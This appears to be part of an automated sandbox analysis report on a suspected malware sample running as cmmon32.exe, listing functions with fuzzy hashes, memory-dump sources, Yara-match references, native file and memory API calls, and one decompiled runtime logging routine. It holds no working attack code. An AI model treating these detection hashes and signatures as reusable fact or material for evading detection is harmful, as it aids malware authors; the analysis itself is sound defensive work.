Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 218ab585eef52b77fe0448a5bc6e5d355e3ad899b017eace9d312f8638265780
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 00C08C32080648BBC7126E45DC00F017B29E7A0B60F040020B6040A5608532ED60E588

Uniqueness

Uniqueness Score: -1.00%

Function 01837D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 24307c06e87a3ec2ce356c9187b6d7cf654f25660f129216be13127a11ad2b6f
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 66B092353029808FCE16DF18C084B1533E4BB84B40B8800D0E400CBA21D329E9008900

Uniqueness

Uniqueness Score: -1.00%

Function 01842ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 29686272c771684cc9f7be3c63ce573c5386cb25cabf1bed90344f8bd2892ff4
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 0EB01233C10451DFCF03EF44C650B197331FB00750F054490D00177930C228AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 018599D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f433c1fb141410a02a5a9a7f70145ac3960e17e54aed885b6cbb1aa7dc00243f
Instruction ID: f4a011d659ba2dc0e8deea119273ba90a956e536fc867a8bed5cac707b629ba1
Opcode Fuzzy Hash: f433c1fb141410a02a5a9a7f70145ac3960e17e54aed885b6cbb1aa7dc00243f
Instruction Fuzzy Hash: 9E9002A131100442D104619A54047060049A7E1341F51C112A3548664CC9698D656165

Uniqueness

Uniqueness Score: -1.00%

Function 018595F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a12750c13bdc960d93fd53753711e80d17cf15590062f26ccde8e8285e42a249
Instruction ID: d94699659a2d4c8f3f7ce90cccda7e2db823180d9ac4988208775f03a4d5b6e9
Opcode Fuzzy Hash: a12750c13bdc960d93fd53753711e80d17cf15590062f26ccde8e8285e42a249
Instruction Fuzzy Hash: C290027130100C02D104619A58046860009A7D0341F51C111A7418765EDAA589957171

Uniqueness

Uniqueness Score: -1.00%

Function 01859520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9a1ab059470a4c82bf3c3694fd9e0e7f24a0c7ffdf41f8fc431990dfff7f49
Instruction ID: 10d2a62e8140ccabf40e90dea1378d5332b7217df79522f2ef0c809da9afce52
Opcode Fuzzy Hash: 3d9a1ab059470a4c82bf3c3694fd9e0e7f24a0c7ffdf41f8fc431990dfff7f49
Instruction Fuzzy Hash: 1F9002E1301144924500A29A9404B0A4509A7E0341B51C116E2448670CC9658955A175

Uniqueness

Uniqueness Score: -1.00%

Function 0185AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ce8018541825c941b685c21448320bab6929dc76a521b492804dff49616b0a
Instruction ID: ee387509df8a6f208d8b79e8e300d3509e6720800604b9c299b849cdc1e9e44c
Opcode Fuzzy Hash: b4ce8018541825c941b685c21448320bab6929dc76a521b492804dff49616b0a
Instruction Fuzzy Hash: 27900271B05004129140719A5814646400AB7E0781B55C111A1908664CCD948B5963E1

Uniqueness

Uniqueness Score: -1.00%

Function 01859950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 465ed667801954d4b263e9702f28b0e3ad1fdbdd3f4cb6e681b7812c4ab1075b
Instruction ID: 62d8e8cb3dcfdb7c899da056104a723b30723e75c8007359d79304db6f598666
Opcode Fuzzy Hash: 465ed667801954d4b263e9702f28b0e3ad1fdbdd3f4cb6e681b7812c4ab1075b
Instruction Fuzzy Hash: 7C9002A130140803D140659A58046070009A7D0342F51C111A3458665ECE698D557175

Uniqueness

Uniqueness Score: -1.00%

Function 01859560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee37f3c56beb6129f91069750431f1a4390a52743baed7a6128c5150a64cd39
Instruction ID: b7f4c94d24c92096bd3dd4378f81d42832be74bef2baae32bf12d59f3c42c58c
Opcode Fuzzy Hash: fee37f3c56beb6129f91069750431f1a4390a52743baed7a6128c5150a64cd39
Instruction Fuzzy Hash: 84900265321004020145A59A160450B0449B7D6391391C115F280A6A0CCA6189696361

Uniqueness

Uniqueness Score: -1.00%

Function 018598A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eebb58552917d703a9ed2844977d2edabf2e61e772b7637229515481cb76841f
Instruction ID: b838ce79a78416c19fb7fd935149c3c04d4d7e47fde6c9522638dbf0e8d937f2
Opcode Fuzzy Hash: eebb58552917d703a9ed2844977d2edabf2e61e772b7637229515481cb76841f
Instruction Fuzzy Hash: EA90026130100802D102619A5414606000DE7D1385F91C112E2818665DCA658A57B172

Uniqueness

Uniqueness Score: -1.00%

Function 01859820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4854f159b8137cfb2b4d5688b673e5ee6695f96587a2f84cf0c2d701a71c3f
Instruction ID: cd1edd6889062e35606cf7e6cf6b7f8fc6ea961b26a7b68f88049d3dfe0b1c0c
Opcode Fuzzy Hash: 4c4854f159b8137cfb2b4d5688b673e5ee6695f96587a2f84cf0c2d701a71c3f
Instruction Fuzzy Hash: 7D90027134100802D141719A5404606000DB7D0381F91C112A1818664ECA958B5ABAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0185B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f39c4e8a444cb4e47b6db1336b615fbf66acd7aede2c1aba28195f8c5918de
Instruction ID: 94f94f77b368248c6c731889de3dc61adc5b2d58c73470dc5a44c8d9f5ca6371
Opcode Fuzzy Hash: 03f39c4e8a444cb4e47b6db1336b615fbf66acd7aede2c1aba28195f8c5918de
Instruction Fuzzy Hash: 989002A1701144434540B19A58044065019B7E1341391C221A1848670CCAA88959A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 0185A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c5bb0252ad94005a3e22ae4c97528f551b59f6377ef4f5d49e32c72e0baff7
Instruction ID: 2dcfa435e98d05db42f470ffdc102e333024e1016f015b2840f7099720535318
Opcode Fuzzy Hash: 71c5bb0252ad94005a3e22ae4c97528f551b59f6377ef4f5d49e32c72e0baff7
Instruction Fuzzy Hash: D890027130144402D140719A944460B5009B7E0341F51C511E1819664CCA55895AA261

Uniqueness

Uniqueness Score: -1.00%

Function 01859FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c2ac81fe23f95299aa99e467241d1598608be47f66bf090cea89f82bbbc47e
Instruction ID: a53d0a06bb907ddc5662515dd8e57db07421b98a26e1264b11ed87cae2e885e9
Opcode Fuzzy Hash: 89c2ac81fe23f95299aa99e467241d1598608be47f66bf090cea89f82bbbc47e
Instruction Fuzzy Hash: 6390027131114802D110619A94047060009A7D1341F51C511A1C18668DCAD589957162

Uniqueness

Uniqueness Score: -1.00%

Function 01859B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fce3869287dba52bfce2e1c93d81e7b2ad1d7af0475b2565c356b8eef489ec80
Instruction ID: 0b8bd366c5745160d669dbf4706f40c09f796769cd4da91fbbe6a647a5f977b9
Opcode Fuzzy Hash: fce3869287dba52bfce2e1c93d81e7b2ad1d7af0475b2565c356b8eef489ec80
Instruction Fuzzy Hash: 9190026134100C02D140719A9414707000AE7D0741F51C111A1418664DCA568A6976F1

Uniqueness

Uniqueness Score: -1.00%

Function 0185A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 595cf0789647eaffae15ca13c45256a70c8ee5470f396b629f6bb0d93107ab93
Instruction ID: 034957b0ab3a614d1849e16b7df7c8df52f71e8e9e65bc8e074646f57f475f10
Opcode Fuzzy Hash: 595cf0789647eaffae15ca13c45256a70c8ee5470f396b629f6bb0d93107ab93
Instruction Fuzzy Hash: 30900271301004529500A6DA6804A4A4109A7F0341B51D115A5408664CC99489656161

Uniqueness

Uniqueness Score: -1.00%

Function 01859730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76586c4b87f3ecb0caaea9b9afc68baeec099b3e040be9366c805d05a17a0db
Instruction ID: d3ebb243c3f950264a76f46fa0a46cef6c7b46d000a180987157f7a2b1753e37
Opcode Fuzzy Hash: f76586c4b87f3ecb0caaea9b9afc68baeec099b3e040be9366c805d05a17a0db
Instruction Fuzzy Hash: 9F90026170500802D140719A64187060019A7D0341F51D111A1418664DCA998B5976E1

Uniqueness

Uniqueness Score: -1.00%

Function 01859760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a1b03a41a14d9bc1a962cd0ba34190859592ffa88b91e2b1d06ee5ec58867c3
Instruction ID: 39278acdbc6c5bba3488ce92d1e64077e697ee172fab8a7bc21d486bf09945e8
Opcode Fuzzy Hash: 9a1b03a41a14d9bc1a962cd0ba34190859592ffa88b91e2b1d06ee5ec58867c3
Instruction Fuzzy Hash: AB90027130100803D100619A65087070009A7D0341F51D511A1818668DDA9689557161

Uniqueness

Uniqueness Score: -1.00%

Function 01859770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a822198c7102dcff67f2a794949fe1e3f0fb70ae2df2fb4d87fb456b625044d7
Instruction ID: 33542610e7a65d6fe3da4a16e24d21db6e6fde21d75703838c14d8747dea146a
Opcode Fuzzy Hash: a822198c7102dcff67f2a794949fe1e3f0fb70ae2df2fb4d87fb456b625044d7
Instruction Fuzzy Hash: 6190026130504842D100659A6408A060009A7D0345F51D111A24586A5DCA758955B171

Uniqueness

Uniqueness Score: -1.00%

Function 0185A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5069cae49e4d4fb708677b06ec4ee8f2c40021d6d9e1d5fa1afd8f8c3298d54
Instruction ID: 12675adeec73025828e6ff975fb0f6f95ce0f4ab43a2253e0ff969ad7d86a9f0
Opcode Fuzzy Hash: a5069cae49e4d4fb708677b06ec4ee8f2c40021d6d9e1d5fa1afd8f8c3298d54
Instruction Fuzzy Hash: 9A90027530504842D500659A6804A870009A7D0345F51D511A18186ACDCA948965B161

Uniqueness

Uniqueness Score: -1.00%

Function 01859A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 562693eed619a19cb94fedbf2fe9a1e6229cea45605e199336ebf2c062705338
Instruction ID: 1638413a7307752422cba62de2245cdb8fff7080cb6f820d257fe2275c5c3987
Opcode Fuzzy Hash: 562693eed619a19cb94fedbf2fe9a1e6229cea45605e199336ebf2c062705338
Instruction Fuzzy Hash: BF90026130144842D140629A5804B0F4109A7E1342F91C119A554A664CCD5589596761

Uniqueness

Uniqueness Score: -1.00%

Function 018596D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9de2e3cc4eed07f3878665978630301179db97544df29f690380dceb65e2d96
Instruction ID: ee9e9fe7e194ccb12c5eb797c4efc0db21fc3a179bcdd1b9a1d85ce6bda4b89e
Opcode Fuzzy Hash: f9de2e3cc4eed07f3878665978630301179db97544df29f690380dceb65e2d96
Instruction Fuzzy Hash: 4790027130100C42D100619A5404B460009A7E0341F51C116A1518764DCA55C9557561

Uniqueness

Uniqueness Score: -1.00%

Function 01859610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44d57e42d42ea0dfd2b9f742996ba8bd0108389a5ef9e474a95b409db5a67ddc
Instruction ID: 6d9659190dc02d1540f7d31dbe92681c9e64b7dd560683b144669b596cdc01c5
Opcode Fuzzy Hash: 44d57e42d42ea0dfd2b9f742996ba8bd0108389a5ef9e474a95b409db5a67ddc
Instruction Fuzzy Hash: 2790027170500C02D150719A54147460009A7D0341F51C111A1418764DCB958B5976E1

Uniqueness

Uniqueness Score: -1.00%

Function 01859A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51189d98961ba632189c798cbf103abbce34860439ff3c1285526bfab81ee3fc
Instruction ID: 10223cb6ffb226ff82e34336917a115fefbaa7f74b5418c2cb2f9a3633d69c31
Opcode Fuzzy Hash: 51189d98961ba632189c798cbf103abbce34860439ff3c1285526bfab81ee3fc
Instruction Fuzzy Hash: AF90027130140802D100619A58087470009A7D0342F51C111A6558665ECAA5C9957571

Uniqueness

Uniqueness Score: -1.00%

Function 01859650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd62049f836f6312036663f8c4c4168011a2c3d28c724e2df2c9ee20fb621dc9
Instruction ID: 5eef20e4de60195761cc7280cbf7538004ee1089deb99ac5c208fd793ee19f13
Opcode Fuzzy Hash: dd62049f836f6312036663f8c4c4168011a2c3d28c724e2df2c9ee20fb621dc9
Instruction Fuzzy Hash: 1390027130504C42D140719A5404A460019A7D0345F51C111A14587A4DDA658E59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01859670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: f17e9c32381371e668d97165d0958959443c3431d9b7c255cbfa9c4645e7d591
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 018AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E018AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0185CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E018A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E018A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x018afdda
0x018afde2
0x018afde5
0x018afdec
0x018afdfa
0x018afdff
0x018afe0a
0x018afe0f
0x018afe17
0x018afe1e
0x018afe19
0x018afe19
0x018afe19
0x018afe20
0x018afe21
0x018afe22
0x018afe25
0x018afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018AFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018AFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018AFE01

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 3ae67e3f48224dfdc9ff76fb45271df93220ef1155edb79a8aa7c4ef20ea9df5
Instruction ID: af65aaac64a60f40ec9bba1538dd9709eb002617ee2e47bb56f4f91c43e033a7
Opcode Fuzzy Hash: 3ae67e3f48224dfdc9ff76fb45271df93220ef1155edb79a8aa7c4ef20ea9df5
Instruction Fuzzy Hash: 24F0FC32100601BFE7211A49DC45F37BF5ADB44730F140315F718951D1EA62FA7096F5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmmon32.exe PID: 4656 Parent PID: 3388 cmmon32.exeCOMMON

Executed Functions

Function 00ED9D5D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00ED4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00ED4B87,007A002E,00000000,00000060,00000000,00000000), ref: 00ED9DAD

Strings

U, xrefs: 00ED9D5D
.z`, xrefs: 00ED9D9D, 00ED9DA8

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$U
API String ID: 823142352-510634365
Opcode ID: 015145e0c0070a3f71fde154bb9fa7a0b3b79945905c1f3a179aea5c2ff68d57
Instruction ID: 7fc4d7a9d3ac0ba0c16376ca9b515eb2988831ef716b0807af691a49c6012b5b
Opcode Fuzzy Hash: 015145e0c0070a3f71fde154bb9fa7a0b3b79945905c1f3a179aea5c2ff68d57
Instruction Fuzzy Hash: F901B6B2204108ABCB08CF88DC95EEB37E9EF8C754F158248FA1D97241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00ED4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00ED4B87,007A002E,00000000,00000060,00000000,00000000), ref: 00ED9DAD

Strings

.z`, xrefs: 00ED9D9D, 00ED9DA8

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: a6126651a49cfd7d600e30795990096c091baa6845c6d4582687b8e42d63a76d
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 13F0B6B2200108ABCB08CF88DC95DEB77EDEF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9E8A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( M,?,?,00ED4D20,00000000,FFFFFFFF), ref: 00ED9EB5

Strings

M, xrefs: 00ED9EAC, 00ED9EB4

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: M
API String ID: 3535843008-447656482
Opcode ID: 8faeb8586e32b048a39c787d590fa611e83d1afeddafdd92cd28e3f511a79aee
Instruction ID: e5397c2f10d18e142cf5b9d8d56fd3d63d7168074b2b7c6925611c54f934dcb0
Opcode Fuzzy Hash: 8faeb8586e32b048a39c787d590fa611e83d1afeddafdd92cd28e3f511a79aee
Instruction Fuzzy Hash: E9E086751002187BD724DB94CC85EA77B9CEF48B50F154466BA18ABB42D530F60186D0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( M,?,?,00ED4D20,00000000,FFFFFFFF), ref: 00ED9EB5

Strings

M, xrefs: 00ED9EAC, 00ED9EB4

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: M
API String ID: 3535843008-447656482
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 816ee5a299159d8e777aae193f947e8a95e323d5151c5e700a9a2de8f7d23707
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: C2D012752002146BD710EB98DC85E97779CEF44750F154455BA586B242C530F60086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9E0B, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00ED4A01,?,?,?,?,00ED4A01,FFFFFFFF,?,BM,?,00000000), ref: 00ED9E55

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ef3a8350767a8355e72e3ba190e628fb5641346ede6239916ea29cf7f2dfe32b
Instruction ID: c084dc0e87b366e98da4d525e4feb13c0101f0889301f5742b66558fa472d7fe
Opcode Fuzzy Hash: ef3a8350767a8355e72e3ba190e628fb5641346ede6239916ea29cf7f2dfe32b
Instruction Fuzzy Hash: 4DF0E2B2200108ABCB04CF98DC80EEB77ADEF8C354F158249BA0DA7251C630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00ED4A01,?,?,?,?,00ED4A01,FFFFFFFF,?,BM,?,00000000), ref: 00ED9E55

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 1e1a26569b391728aed923185fec2252277ea60c143770ca764c039f3ede8599
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: E4F0A4B2200208ABCB14DF89DC91EEB77ADEF8C754F158259BA1DA7241D630E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00EC2D11,00002000,00003000,00000004), ref: 00ED9F79

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 5aee2d62068ff5a2760466ea107e5743b070a4a5f8a48fe462960de253d5b63a
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 2DF015B2200208ABCB14DF89DC81EAB77ADEF88750F158159BE08A7241C630F911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9F3A, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00EC2D11,00002000,00003000,00000004), ref: 00ED9F79

Memory Dump Source

Source File: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f2bdcc85cc9ec973cbb8baaef074dd40280cadf4c2f30b51edc4014a127f123b
Instruction ID: a037f845c6be30dc6e9f7a58541a93de8e3b04b38e8f82077f1a06a82f0db6e7
Opcode Fuzzy Hash: f2bdcc85cc9ec973cbb8baaef074dd40280cadf4c2f30b51edc4014a127f123b
Instruction Fuzzy Hash: CFF01CB1200209AFCB14DF99DC81EE7B7ADEF88750F158159FE58A7241C630E921CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04E29860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E2986A

Memory Dump Source

Source File: 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: true

Associated: 00000013.00000002.561813556.0000000004EDB000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.561827824.0000000004EDF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cc0c5684d9fcd896ad7327b6721ebdc97907e605e45de08c75aa7484be26fb1d
Instruction ID: e8a8e788574bb165ff3dd9f91c4bbf1060e081c1a7a7a9e1405359b65e5ac4da
Opcode Fuzzy Hash: cc0c5684d9fcd896ad7327b6721ebdc97907e605e45de08c75aa7484be26fb1d
